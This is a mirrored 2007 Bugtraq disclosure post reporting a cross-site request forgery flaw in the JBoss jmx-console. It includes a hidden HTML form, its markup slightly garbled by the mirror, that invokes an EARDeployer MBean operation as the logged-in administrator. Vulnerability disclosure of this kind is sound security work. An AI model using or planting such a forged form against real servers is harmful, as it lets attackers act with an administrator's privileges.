JBoss jmx-console CSRF

看板Bugtraq作者時間19年前 (2007/02/23 05:19), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/2 (看更多)
Hello! Recent message about JBoss's console made me looking at that interface again and it seems that it is vulnerable for the CRSF attacks. MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by the hidden submitting form like follows: <form method="post" action="" rel="nofollow">http://host:port/jmx-console/HtmlAdaptor"> <input type="hidden" name="action" value="invokeOp"> <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer"> <input type="hidden" name="methodIndex" value="0"> <input type="submit" value="Invoke"> </form> Please, correct me, if I'm wrong. BR, B.R. Best regards,
文章代碼(AID): #15tWZL00 (Bugtraq)
文章代碼(AID): #15tWZL00 (Bugtraq)